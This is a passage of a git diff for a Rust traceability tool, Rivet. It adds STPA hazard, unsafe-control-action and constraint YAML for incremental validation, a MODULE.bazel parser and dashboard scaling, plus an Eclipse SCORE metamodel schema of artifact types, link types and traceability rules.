self.artifacts.insert(id.clone(), artifact); diff --git a/rivet-core/src/validate.rs b/rivet-core/src/validate.rs index 57f9c2e..b4c0935 100644 --- a/rivet-core/src/validate.rs +++ b/rivet-core/src/validate.rs @@ -70,22 +70,20 @@ pub fn validate(store: &Store, schema: &Schema, graph: &LinkGraph) -> Vec Vec + Dashboard must enforce a node budget on graph layout, display a + helpful message when exceeded, and provide filter/focus controls + to narrow the view. Layout computation must run in spawn_blocking + to avoid blocking the async runtime. 
+ ucas: [UCA-D-3] + hazards: [H-13] + + # ========================================================================= + # Incremental validation constraints (salsa) + # ========================================================================= + - id: CC-C-10 + controller: CTRL-CORE + constraint: > + Core salsa database must invalidate all dependent queries when + an artifact source file is modified on disk, ensuring no stale + cached results are returned. + ucas: [UCA-C-10] + hazards: [H-9, H-1, H-3] + + - id: CC-C-11 + controller: CTRL-CORE + constraint: > + Core must re-evaluate all conditional rules whose when-clause + references a field that has changed, even if the artifact's + other fields are unchanged. + ucas: [UCA-C-11] + hazards: [H-9, H-1] + + - id: CC-C-12 + controller: CTRL-CORE + constraint: > + Core must detect contradictory conditional rules at schema load + time and reject the schema with a diagnostic identifying the + conflicting rules, before any validation occurs. + ucas: [UCA-C-12] + hazards: [H-10] + + - id: CC-C-13 + controller: CTRL-CORE + constraint: > + Core incremental validation must produce byte-identical diagnostic + output compared to a clean full validation pass for the same inputs. + A periodic full-revalidation check must verify this invariant. + ucas: [UCA-C-13] + hazards: [H-9, H-3] + + - id: CC-C-14 + controller: CTRL-CORE + constraint: > + Core must enforce that schema loading and merge complete before + conditional rule evaluation begins, via salsa query dependencies. + ucas: [UCA-C-14] + hazards: [H-9, H-10] + + # ========================================================================= + # MODULE.bazel parser constraints + # ========================================================================= + - id: CC-C-15 + controller: CTRL-CORE + constraint: > + Parser must extract git_override, archive_override, and + local_path_override declarations and apply them to override + the corresponding bazel_dep version/source. 
+ ucas: [UCA-C-15] + hazards: [H-11, H-1] + + - id: CC-C-16 + controller: CTRL-CORE + constraint: > + Parser must emit a diagnostic for every Starlark construct it + does not support, listing what was skipped and what dependencies + may be missing from the result. Silent skip is forbidden. + ucas: [UCA-C-16] + hazards: [H-11] + + - id: CC-C-17 + controller: CTRL-CORE + constraint: > + Parser must associate keyword argument values with the correct + parameter names in the CST, verified by test cases covering all + supported function call types. + ucas: [UCA-C-17] + hazards: [H-11, H-1] diff --git a/safety/stpa/hazards.yaml b/safety/stpa/hazards.yaml index 5f30d28..9d5a4d9 100644 --- a/safety/stpa/hazards.yaml +++ b/safety/stpa/hazards.yaml @@ -82,6 +82,57 @@ hazards: incident. losses: [L-1, L-3, L-4] + - id: H-9 + title: Rivet incremental validation returns stale results due to missed invalidation + description: > + The salsa incremental computation engine fails to invalidate a + cached validation result when an upstream input changes. The + validation reports PASS based on the previous state while the + current state contains violations. In a worst-case environment + where CI trusts incremental results, this silently passes a + broken traceability state. + losses: [L-1, L-2, L-5] + + - id: H-10 + title: Rivet conditional validation rules contradict, making compliance impossible + description: > + Two or more conditional rules fire on the same artifact and impose + contradictory requirements (e.g., rule A requires field X when + status=approved, rule B forbids field X when safety=ASIL_B). + No valid artifact configuration exists, but the tool does not + detect the inconsistency, causing perpetual validation failures + that engineers work around by disabling rules. 
+ losses: [L-1, L-4, L-5] + + - id: H-11 + title: Rivet MODULE.bazel parser silently misparses dependency declarations + description: > + The Starlark subset parser incorrectly extracts module names, + versions, or git_override commits from MODULE.bazel. Cross-repo + validation runs against the wrong repo versions, reporting + traceability coverage against mismatched baselines. + losses: [L-1, L-2, L-5] + + - id: H-12 + title: Rivet formal proofs verify a model that diverges from the implementation + description: > + The Rocq metamodel specification or Verus annotations describe + properties of an idealized validation algorithm that differs from + the actual Rust implementation. Proofs pass but the implementation + has bugs that the proofs do not cover, creating false assurance + of correctness. + losses: [L-2, L-5] + + - id: H-13 + title: Rivet dashboard becomes unresponsive when artifact count exceeds layout engine capacity + description: > + When a project contains hundreds or thousands of artifacts, the graph + layout algorithm (O(N² log N) Sugiyama) exhausts memory or blocks the + async runtime, causing the dashboard to hang or crash. Engineers lose + the ability to visualize and navigate traceability, defeating the + tool's purpose. + losses: [L-4, L-5] + sub-hazards: # --- H-1 refinements: types of stale references --- - id: H-1.1 @@ -132,3 +183,39 @@ sub-hazards: ReqIF XHTML content or OSLC rich-text descriptions are stripped to plain text, losing tables, formulas, or embedded diagrams that are essential to understanding the requirement. + + # --- H-9 refinements: incremental invalidation failures --- + - id: H-9.1 + parent: H-9 + title: Rivet salsa database does not track schema file changes as inputs + description: > + A schema file is modified (e.g., adding a conditional rule) but + the salsa input query for schemas is not invalidated. Validation + continues using the old schema, missing the new rule. 
+ + - id: H-9.2 + parent: H-9 + title: Rivet salsa database does not invalidate cross-repo link validation on external changes + description: > + An external repository's artifacts change (new commit fetched), + but the salsa queries for cross-repo link resolution are not + invalidated. Broken cross-repo links are not detected. + + # --- H-11 refinements: parser misparse scenarios --- + - id: H-11.1 + parent: H-11 + title: Rivet parser ignores git_override and uses registry version instead + description: > + MODULE.bazel contains both bazel_dep(version="1.0") and + git_override(commit="abc123"). The parser extracts the registry + version but misses the override, causing validation against the + wrong repo checkout. + + - id: H-11.2 + parent: H-11 + title: Rivet parser fails on valid Starlark syntax it does not support + description: > + MODULE.bazel uses string concatenation, variable references, or + load() statements that the Starlark subset parser does not handle. + The parser silently skips the unrecognized construct, missing a + dependency declaration. diff --git a/safety/stpa/system-constraints.yaml b/safety/stpa/system-constraints.yaml index 2c06301..c6682b4 100644 --- a/safety/stpa/system-constraints.yaml +++ b/safety/stpa/system-constraints.yaml @@ -97,3 +97,51 @@ system-constraints: exists and is reachable at link-creation time, recording the verification timestamp. hazards: [H-1, H-3] + + - id: SC-11 + title: Rivet incremental validation must produce identical results to full validation + description: > + For any set of inputs, incremental validation (via salsa dependency + tracking) must produce exactly the same diagnostics as a clean full + validation pass. If incremental and full results ever diverge, the + system must detect the divergence and fall back to full validation. 
+ hazards: [H-9] + + - id: SC-12 + title: Rivet must verify conditional rule consistency before applying rules + description: > + When loading schemas with conditional rules, Rivet must check that + no combination of conditions can produce contradictory requirements + on a single artifact. Inconsistent rule sets must be rejected at + schema load time with a diagnostic identifying the conflicting rules. + hazards: [H-10] + + - id: SC-13 + title: Rivet build-system parsers must reject unrecognized constructs with diagnostics + description: > + The MODULE.bazel parser must emit a diagnostic for any Starlark + construct it does not support (load statements, variable references, + string concatenation, conditionals). Silently skipping constructs + is forbidden. The parser must report what it could not parse and + what dependencies may be missing from the result. + hazards: [H-11] + + - id: SC-14 + title: Rivet formal proofs must be validated against the implementation under test + description: > + Formal verification must prove properties of the actual compiled + code, not a separate model. Kani harnesses must call the real + functions. Verus annotations must be on the real implementations. + Rocq specifications must be generated from or validated against + the Rust source via coq-of-rust, not hand-written independently. + hazards: [H-12] + + - id: SC-15 + title: Dashboard must degrade gracefully when artifact count exceeds rendering thresholds + description: > + The dashboard must impose node budgets on graph layout, paginate + large artifact lists, and progressively disclose detail rather than + attempting to render everything at once. Layout computation must run + outside the async runtime to prevent blocking other requests. 
+ hazards: [H-13] + spec-baseline: "v0.2.0" diff --git a/safety/stpa/ucas.yaml b/safety/stpa/ucas.yaml index 3e41da9..6d2dd6f 100644 --- a/safety/stpa/ucas.yaml +++ b/safety/stpa/ucas.yaml @@ -527,5 +527,148 @@ dashboard-ucas: Stale metrics mislead developers and auditors about the current state of traceability. + - id: UCA-D-3 + description: > + Dashboard provides full unfiltered graph visualization when artifact + count exceeds the layout engine's capacity, causing the Sugiyama + algorithm to exhaust memory or block the async runtime. + context: > + Project contains 500+ artifacts and user navigates to /graph without + type filters or focus. The layout runs synchronously on the tokio + runtime thread. + hazards: [H-13] + rationale: > + The O(N² log N) barycenter heuristic with 4 sweep iterations becomes + prohibitively expensive above ~300 nodes. Running it on the async + runtime blocks all other dashboard requests. + + too-early-too-late: [] + stopped-too-soon: [] + +# ============================================================================= +# Core Engine UCAs — Incremental validation (salsa) +# CA-CORE-1 extended: incremental link graph rebuild +# CA-CORE-2 extended: incremental validation +# ============================================================================= +incremental-ucas: + control-action: Incrementally recompute validation via salsa dependency tracking + controller: CTRL-CORE + + not-providing: + - id: UCA-C-10 + description: > + Core salsa database does not invalidate link graph queries when + an artifact file is modified on disk. + context: > + Developer edits a YAML file, but the salsa input query for that + file is not updated. Subsequent validation returns cached results + from the previous file contents. + hazards: [H-9, H-1, H-3] + rationale: > + The fundamental incremental correctness property is violated: + stale cached validation results create false assurance. 
+ + - id: UCA-C-11 + description: > + Core does not re-evaluate conditional rules when the field they + depend on changes. + context: > + A conditional rule checks "if status == approved then + verification-criteria required." An artifact's status changes + from draft to approved, but the conditional rule query is not + invalidated. + hazards: [H-9, H-1] + rationale: > + The newly-approved artifact lacks verification-criteria but + the conditional rule does not fire because salsa returns the + cached result from when the artifact was still draft. + + providing: + - id: UCA-C-12 + description: > + Core applies conditional validation rules that contradict each + other on the same artifact. + context: > + Schema defines rule A requiring field X when status=approved, + and rule B forbidding field X when safety=ASIL_B. An artifact + has both status=approved and safety=ASIL_B. + hazards: [H-10] + rationale: > + Contradictory rules make compliance impossible. Engineers + disable or work around rules, undermining the validation system. + + - id: UCA-C-13 + description: > + Core incremental validation produces different diagnostics than + a clean full validation pass for the same inputs. + context: > + A sequence of incremental changes accumulates stale intermediate + results that a fresh full pass would not produce. + hazards: [H-9, H-3] + rationale: > + Divergence between incremental and full results means the tool + cannot be trusted. Safety-critical tooling must be deterministic. + + too-early-too-late: + - id: UCA-C-14 + description: > + Core evaluates conditional rules before schema loading completes, + using an incomplete rule set. + context: > + Salsa query ordering allows conditional rule evaluation to + proceed before all schema files have been parsed and merged. + hazards: [H-9, H-10] + rationale: > + Missing conditional rules means violations go undetected. + Rules added later in the schema merge are never applied. 
+ + stopped-too-soon: [] + +# ============================================================================= +# Parser UCAs — MODULE.bazel Starlark subset parser +# ============================================================================= +parser-ucas: + control-action: Parse MODULE.bazel to discover cross-repo dependencies + controller: CTRL-CORE + + not-providing: + - id: UCA-C-15 + description: > + Parser does not extract git_override commit SHA, causing + cross-repo validation to run against the registry version + instead of the pinned override. + context: > + MODULE.bazel contains both bazel_dep(version="1.0") and + git_override(commit="abc123"). Parser extracts only bazel_dep. + hazards: [H-11, H-1] + rationale: > + Validation runs against the wrong version of the external repo, + producing coverage results that don't match the actual baseline. + + - id: UCA-C-16 + description: > + Parser does not emit a diagnostic when encountering unsupported + Starlark constructs, silently skipping them. + context: > + MODULE.bazel uses load() statements, string concatenation, or + variable references that the subset parser cannot handle. + hazards: [H-11] + rationale: > + Missing dependencies are not reported. Cross-repo validation + has blind spots where repos are not discovered. + + providing: + - id: UCA-C-17 + description: > + Parser extracts incorrect module name or version from a + bazel_dep() call due to malformed CST construction. + context: > + A parsing bug causes keyword argument values to be associated + with the wrong parameter names. + hazards: [H-11, H-1] + rationale: > + Cross-repo links resolve against a different module than + intended, producing silently incorrect traceability. 
+ too-early-too-late: [] stopped-too-soon: [] diff --git a/schemas/aadl.yaml b/schemas/aadl.yaml index f559033..3a61c60 100644 --- a/schemas/aadl.yaml +++ b/schemas/aadl.yaml @@ -87,6 +87,65 @@ artifact-types: required: false cardinality: zero-or-many + - name: aadl-tool + description: > + An AADL ecosystem tool — captures what it does, what makes it + unique, and what capabilities spar could adopt from it. + fields: + - name: tool-url + type: string + required: false + description: Canonical URL for the tool or project + - name: origin + type: string + required: false + allowed-values: [academic, industry, open-source, government] + - name: maintainer + type: string + required: false + description: Organization or group maintaining the tool + - name: tool-status + type: string + required: true + allowed-values: [active, maintained, unmaintained, research-only, commercial] + - name: category + type: string + required: true + allowed-values: + - ide + - analysis + - verification + - code-generation + - scheduling + - safety + - optimization + - modeling + - simulation + - requirements + - name: capabilities + type: list + required: true + description: What the tool does (list of capability strings) + - name: differentiator + type: text + required: false + description: What makes this tool unique or special + - name: adoption-potential + type: text + required: false + description: What spar could adopt from this tool and at what priority + - name: spar-status + type: string + required: false + allowed-values: [not-applicable, not-started, partial, equivalent, superior] + description: How spar compares for this tool's core capability + link-fields: + - name: competes-with + link-type: traces-to + target-types: [aadl-tool] + required: false + cardinality: zero-or-many + - name: aadl-flow description: End-to-end flow with latency bounds fields: diff --git a/schemas/score.yaml b/schemas/score.yaml new file mode 100644 index 0000000..cd1d212 --- /dev/null +++ 
b/schemas/score.yaml @@ -0,0 +1,876 @@ +# Eclipse SCORE metamodel schema +# +# Maps the full Eclipse SCORE (Safety-Certified Open-source Real-time Ecosystem) +# metamodel into Rivet artifact types, link types, and traceability rules. +# +# SCORE targets ISO 26262 / ASIL-rated software and defines a V-model +# traceability chain from stakeholder requirements through architecture, +# implementation, and verification, with dedicated safety analysis types +# (FMEA, DFA) and process support artifacts. +# +# Metamodel areas: +# Process — tool support functions, workflows, guidance, tool requirements +# Requirements — stakeholder, feature, component, assumption-of-use +# Architecture — features (logical), components, modules, static/dynamic design +# Implementation — software units +# Safety — FMEA entries, dependent failure analysis +# Verification — test specifications, executions, verdicts +# Documents — general documents, architecture decision records +# +# References: +# https://eclipse-score.github.io/score/ + +schema: + name: score + version: "0.1.0" + namespace: "http://pulseengine.dev/ns/score#" + extends: [common] + description: > + Eclipse SCORE metamodel artifact types and traceability rules for + safety-certified automotive software (ISO 26262, ASIL A-D). + +# ────────────────────────────────────────────────────────────────────────── +# Artifact types +# ────────────────────────────────────────────────────────────────────────── +artifact-types: + + # ── Process types ────────────────────────────────────────────────────── + + - name: tsf + description: > + Tool support function — a capability provided by a development tool + that supports the SCORE workflow (e.g. build, lint, trace, test runner). 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: tool-name + type: string + required: false + description: Name of the tool providing this function + - name: tool-version + type: string + required: false + description: Version of the tool + - name: classification + type: string + required: false + allowed-values: [TI1, TI2, TI3] + description: Tool impact classification per ISO 26262-8 + link-fields: + - name: fulfils + link-type: fulfils + target-types: [tool-req] + cardinality: zero-or-many + + - name: workflow + description: > + A defined process workflow describing how artifacts are created, + reviewed, and released within the SCORE development process. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: process-area + type: string + required: false + description: Process area this workflow belongs to + link-fields: + - name: uses + link-type: uses + target-types: [tsf, guidance] + cardinality: zero-or-many + + - name: guidance + description: > + A guidance document providing instructions, templates, or conventions + for performing a development activity within SCORE. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: guidance-type + type: string + required: false + allowed-values: [template, convention, instruction, checklist] + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [workflow] + cardinality: zero-or-many + + - name: tool-req + description: > + A requirement on a development tool — specifies what a tool must do + to be qualified for use in the safety lifecycle. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + link-fields: + - name: satisfies + link-type: satisfies + target-types: [stkh-req, feat-req] + cardinality: zero-or-many + - name: complies + link-type: complies + cardinality: zero-or-many + description: Standards or regulations this tool requirement complies with + + # ── Requirements ─────────────────────────────────────────────────────── + + - name: stkh-req + description: > + Stakeholder requirement — a high-level need or expectation from a + stakeholder that the system must address. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: priority + type: string + required: false + allowed-values: [must, should, could, wont] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: source + type: string + required: false + description: Origin of the requirement (customer, regulation, standard) + - name: rationale + type: text + required: false + link-fields: [] + + - name: feat-req + description: > + Feature requirement — a requirement derived from stakeholder needs + that defines what a feature must provide. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: priority + type: string + required: false + allowed-values: [must, should, could, wont] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: req-type + type: string + required: false + allowed-values: [functional, performance, interface, constraint, safety] + - name: verification-criteria + type: text + required: false + link-fields: + - name: satisfies + link-type: satisfies + target-types: [stkh-req] + required: true + cardinality: one-or-many + + - name: comp-req + description: > + Component requirement — a technical requirement allocated to a + specific architectural component, derived from feature requirements. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: priority + type: string + required: false + allowed-values: [must, should, could, wont] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: req-type + type: string + required: false + allowed-values: [functional, performance, interface, constraint, safety] + - name: verification-criteria + type: text + required: false + link-fields: + - name: satisfies + link-type: satisfies + target-types: [feat-req] + required: true + cardinality: one-or-many + + - name: aou-req + description: > + Assumption of use requirement — a condition or constraint that must + hold for the system to operate safely. Documents the boundary + conditions and operating assumptions. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: assumption-type + type: string + required: false + allowed-values: [environmental, operational, interface, integration] + link-fields: + - name: complies + link-type: complies + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [feat, comp] + cardinality: zero-or-many + + # ── Architecture ─────────────────────────────────────────────────────── + + - name: feat + description: > + Feature — a logical architectural element representing a user-visible + capability. Acts as the top-level grouping in the logical architecture. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: interfaces + type: structured + required: false + description: Provided and required interfaces + link-fields: + - name: satisfies + link-type: satisfies + target-types: [feat-req] + cardinality: zero-or-many + + - name: comp + description: > + Component — a concrete architectural building block that realizes + one or more features. Maps to a deployable unit in the system. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: component-type + type: string + required: false + allowed-values: [library, service, driver, middleware, application, platform] + - name: interfaces + type: structured + required: false + description: Provided and required interfaces + link-fields: + - name: realizes + link-type: realizes + target-types: [feat] + required: true + cardinality: one-or-many + - name: uses + link-type: uses + target-types: [comp] + cardinality: zero-or-many + + - name: mod + description: > + Module — a fine-grained decomposition of a component into compilation + units or logical groupings of source files. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: source-path + type: string + required: false + description: Path to the source directory or file for this module + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [comp] + required: true + cardinality: one-or-many + - name: uses + link-type: uses + target-types: [mod] + cardinality: zero-or-many + + - name: dd-sta + description: > + Static detailed design — a view of the architecture showing the + structural relationships between components and modules (class + diagrams, package structure, data types). 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: view-type + type: string + required: false + allowed-values: [class-diagram, package-diagram, data-model, interface-spec] + link-fields: + - name: implements + link-type: implements + target-types: [comp-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [comp, mod] + cardinality: zero-or-many + + - name: dd-dyn + description: > + Dynamic detailed design — a view of the architecture showing + runtime behavior (sequence diagrams, state machines, activity flows). + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: view-type + type: string + required: false + allowed-values: [sequence-diagram, state-machine, activity-diagram, timing-diagram] + link-fields: + - name: implements + link-type: implements + target-types: [comp-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [comp, mod] + cardinality: zero-or-many + + # ── Implementation ───────────────────────────────────────────────────── + + - name: sw-unit + description: > + Software unit — a single source file or compilation unit that + implements part of the detailed design. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: source-file + type: string + required: false + description: Path to the source file + - name: language + type: string + required: false + allowed-values: [cpp, c, rust, python] + link-fields: + - name: implements + link-type: implements + target-types: [dd-sta, dd-dyn] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [mod, comp] + cardinality: zero-or-many + + # ── Safety analysis ──────────────────────────────────────────────────── + + - name: fmea-entry + description: > + FMEA failure mode — an entry in a Failure Mode and Effects Analysis + identifying a potential failure mode, its effects, severity, and + mitigations. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: failure-mode + type: text + required: true + description: Description of the potential failure mode + - name: effect + type: text + required: false + description: Effect of the failure on the system or user + - name: cause + type: text + required: false + description: Root cause or mechanism of the failure + - name: severity + type: string + required: false + description: Severity rating (1-10 or category) + - name: occurrence + type: string + required: false + description: Occurrence/probability rating + - name: detection + type: string + required: false + description: Detection rating (ability to detect before harm) + - name: rpn + type: string + required: false + description: Risk Priority Number (severity x occurrence x detection) + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [comp, mod, feat] 
+ cardinality: zero-or-many + - name: mitigated-by + link-type: mitigated-by + target-types: [comp-req, dd-sta, dd-dyn, sw-unit] + cardinality: zero-or-many + - name: violates + link-type: violates + target-types: [comp-req, feat-req] + cardinality: zero-or-many + + - name: dfa-entry + description: > + Dependent failure analysis entry — documents analysis of common-cause + and cascading failures between components (ISO 26262-9 clause 7). + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: failure-type + type: string + required: false + allowed-values: [common-cause, cascading, coupling] + description: Type of dependent failure + - name: analysis + type: text + required: true + description: Description of the dependent failure analysis + - name: coupling-factor + type: text + required: false + description: Root cause coupling factor between dependent elements + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [comp, feat] + cardinality: zero-or-many + - name: mitigated-by + link-type: mitigated-by + target-types: [comp-req, dd-sta, dd-dyn, sw-unit] + cardinality: zero-or-many + + # ── Verification ─────────────────────────────────────────────────────── + + - name: test-spec + description: > + Test specification — defines what to verify and the expected outcome. + May reference multiple requirement types and specify full or partial + verification coverage. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: test-method + type: string + required: false + allowed-values: + - automated-test + - manual-test + - review + - static-analysis + - formal-verification + - simulation + - inspection + - name: preconditions + type: list + required: false + - name: steps + type: structured + required: false + - name: expected-result + type: text + required: false + link-fields: + - name: fully-verifies + link-type: fully-verifies + target-types: [stkh-req, feat-req, comp-req, aou-req] + cardinality: zero-or-many + - name: partially-verifies + link-type: partially-verifies + target-types: [stkh-req, feat-req, comp-req, aou-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [comp, feat] + cardinality: zero-or-many + + - name: test-exec + description: > + Test execution — a record of running a test specification against + a specific version or configuration of the system. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: version + type: string + required: true + description: Version or release identifier under test + - name: commit + type: string + required: false + description: Git commit SHA + - name: timestamp + type: string + required: true + description: When the execution occurred (ISO 8601) + - name: executor + type: string + required: false + description: Who or what ran the test (CI system, person) + - name: environment + type: structured + required: false + description: OS, toolchain, hardware configuration + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [test-spec] + required: true + cardinality: one-or-many + + - name: test-verdict + description: > + Test verdict — the pass/fail outcome of a single test specification + within an execution run. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: verdict + type: string + required: true + allowed-values: [pass, fail, blocked, skipped, error] + - name: duration-ms + type: number + required: false + - name: evidence + type: string + required: false + description: Path to log file or test artifact + - name: defect + type: string + required: false + description: Issue tracker reference for failures + - name: failure-reason + type: text + required: false + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [test-exec] + required: true + cardinality: exactly-one + - name: fulfils + link-type: fulfils + target-types: [test-spec] + required: true + cardinality: exactly-one + + # ── Documents ────────────────────────────────────────────────────────── + + - name: doc + description: > + Document — a general-purpose document artifact (specification, + plan, report, manual) managed within the SCORE lifecycle. 
+ fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: doc-type + type: string + required: false + allowed-values: + - specification + - plan + - report + - manual + - standard + - guideline + - name: version + type: string + required: false + - name: authors + type: list + required: false + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [workflow, feat, comp] + cardinality: zero-or-many + + - name: decision-record + description: > + Architecture decision record (ADR) — documents a significant + architectural or design decision, its context, alternatives + considered, and rationale. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: rationale + type: text + required: true + description: Why this decision was made + - name: alternatives + type: text + required: false + description: Alternatives considered and why they were rejected + - name: consequences + type: text + required: false + description: Known consequences and trade-offs + link-fields: + - name: satisfies + link-type: satisfies + target-types: [feat-req, comp-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [feat, comp] + cardinality: zero-or-many + +# ────────────────────────────────────────────────────────────────────────── +# SCORE-specific link types +# +# Link types already defined in common.yaml and reused here: +# satisfies / satisfied-by +# implements / implemented-by +# mitigates / mitigated-by +# verifies / verified-by +# +# The following are SCORE-specific additions. +# ────────────────────────────────────────────────────────────────────────── +link-types: + - name: complies + inverse: complied-by + description: Source complies with the target (standard, regulation, norm) + + - name: fulfils + inverse: fulfilled-by + description: Source fulfils the target (e.g. 
tool support function fulfils a tool requirement) + source-types: [tsf, test-verdict] + target-types: [tool-req, test-spec] + + - name: belongs-to + inverse: consists-of + description: Source belongs to / is part of the target (compositional containment) + + - name: uses + inverse: used-by + description: Source uses or depends on the target at runtime or build time + + - name: violates + inverse: violated-by + description: Source violates the target (failure mode contradicts a requirement) + source-types: [fmea-entry] + target-types: [comp-req, feat-req] + + - name: fully-verifies + inverse: fully-verified-by + description: Source fully verifies the target (complete verification coverage) + source-types: [test-spec] + target-types: [stkh-req, feat-req, comp-req, aou-req] + + - name: partially-verifies + inverse: partially-verified-by + description: Source partially verifies the target (incomplete verification coverage) + source-types: [test-spec] + target-types: [stkh-req, feat-req, comp-req, aou-req] + + - name: realizes + inverse: realized-by + description: Source realizes the target (component realizes a feature) + source-types: [comp] + target-types: [feat] + +# ────────────────────────────────────────────────────────────────────────── +# SCORE traceability rules +# +# These encode the SCORE V-model traceability chain. +# `rivet validate` checks these automatically. 
+# ────────────────────────────────────────────────────────────────────────── +traceability-rules: + + # ── Requirement chain (top-down) ─────────────────────────────────────── + + - name: stkh-req-has-feat-req + description: Every stakeholder requirement must be satisfied by at least one feature requirement + source-type: stkh-req + required-backlink: satisfies + from-types: [feat-req] + severity: warning + + - name: feat-req-derives-from-stkh + description: Every feature requirement must satisfy at least one stakeholder requirement + source-type: feat-req + required-link: satisfies + target-types: [stkh-req] + severity: error + + - name: feat-req-has-comp-req + description: Every feature requirement must be satisfied by at least one component requirement + source-type: feat-req + required-backlink: satisfies + from-types: [comp-req] + severity: warning + + - name: comp-req-derives-from-feat + description: Every component requirement must satisfy at least one feature requirement + source-type: comp-req + required-link: satisfies + target-types: [feat-req] + severity: error + + # ── Design implementation ────────────────────────────────────────────── + + - name: comp-req-has-design + description: Every component requirement must be implemented by a static or dynamic design + source-type: comp-req + required-backlink: implements + from-types: [dd-sta, dd-dyn] + severity: warning + + # ── Architecture realization ─────────────────────────────────────────── + + - name: feat-has-comp + description: Every feature must be realized by at least one component + source-type: feat + required-backlink: realizes + from-types: [comp] + severity: warning + + - name: comp-realizes-feat + description: Every component must realize at least one feature + source-type: comp + required-link: realizes + target-types: [feat] + severity: error + + # ── Verification coverage ────────────────────────────────────────────── + + - name: test-spec-verifies-req + description: > + Every test 
 specification must have a fully-verifies link to at least one
+      requirement — partially-verifies alone does not satisfy this rule
+    source-type: test-spec
+    required-link: fully-verifies
+    target-types: [stkh-req, feat-req, comp-req, aou-req]
+    severity: warning
+
+  - name: feat-req-has-verification
+    description: Every feature requirement should be verified by at least one test specification
+    source-type: feat-req
+    required-backlink: fully-verifies
+    from-types: [test-spec]
+    severity: warning
+
+  - name: comp-req-has-verification
+    description: Every component requirement should be verified by at least one test specification
+    source-type: comp-req
+    required-backlink: fully-verifies
+    from-types: [test-spec]
+    severity: warning
+
+  # ── Module containment ─────────────────────────────────────────────────
+
+  - name: mod-belongs-to-comp
+    description: Every module must belong to at least one component
+    source-type: mod
+    required-link: belongs-to
+    target-types: [comp]
+    severity: error
+
+  # ── Safety analysis ──────────────────────────────────────────────────────
+
+  - name: fmea-has-mitigation
+    description: Every FMEA entry should have at least one mitigation
+    source-type: fmea-entry
+    required-link: mitigated-by
+    target-types: [comp-req, dd-sta, dd-dyn, sw-unit]
+    severity: warning
+
+  # ── Test verdict chain ───────────────────────────────────────────────
+
+  - name: verdict-has-exec
+    description: Every test verdict must belong to a test execution
+    source-type: test-verdict
+    required-link: belongs-to
+    target-types: [test-exec]
